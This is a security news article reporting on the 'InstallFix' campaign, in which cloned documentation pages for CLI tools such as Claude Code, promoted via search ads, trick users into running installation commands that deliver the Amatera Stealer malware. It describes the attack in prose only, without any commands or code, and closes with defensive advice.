Cybercriminals use ‘InstallFix’ social engineering technique to spread data-stealing malware

Security researchers have uncovered a new social engineering tactic called InstallFix that tricks users into running malicious commands disguised as legitimate CLI tool installations, potentially exposing sensitive data such as credentials and cryptocurrency wallets.

Cybersecurity researchers have identified a new social engineering tactic called InstallFix, which threat actors are using to trick users into executing malicious commands disguised as legitimate software installation steps.

The technique builds on the previously known ClickFix approach and primarily targets users who install command-line interface (CLI) tools from online sources. According to researchers at Push Security, attackers create fake installation pages that closely resemble official documentation pages for popular developer tools.

These pages appear authentic, featuring identical layouts, branding elements, and navigation links. However, the installation instructions displayed on these cloned sites contain altered commands designed to install malware instead of legitimate software.

Fake installation pages target CLI tool users

The fraudulent pages mimic official documentation for developer utilities such as Claude Code, a CLI coding assistant developed by Anthropic. While most links on the page redirect users to legitimate sources, the installation commands for operating systems like macOS and Windows are modified to trigger malicious downloads.

Users who follow these instructions may unknowingly execute commands that install harmful software on their systems. Researchers warn that the attack is particularly deceptive because victims can continue browsing legitimate documentation after running the malicious command, making it harder to detect the compromise.

Attackers are promoting these fake pages through sponsored advertisements in search results, including ads appearing on Google search queries related to installing CLI tools.

Amatera Stealer malware delivered through attacks

Once the malicious command is executed, systems may be infected with Amatera Stealer, a relatively new malware strain designed to steal sensitive information. The malware targets stored browser data such as passwords, cookies, and session tokens, while also attempting to extract cryptocurrency wallet information and system details.

Security analysts believe Amatera is derived from the ACR Stealer malware family and is offered to cybercriminals under a malware-as-a-service model.

Researchers also noted that many of the malicious websites are hosted on legitimate platforms, including Cloudflare and Squarespace, which helps attackers evade detection.

Security experts advise users to download software only from verified sources, avoid clicking sponsored search results when installing developer tools, and carefully review installation commands before executing them.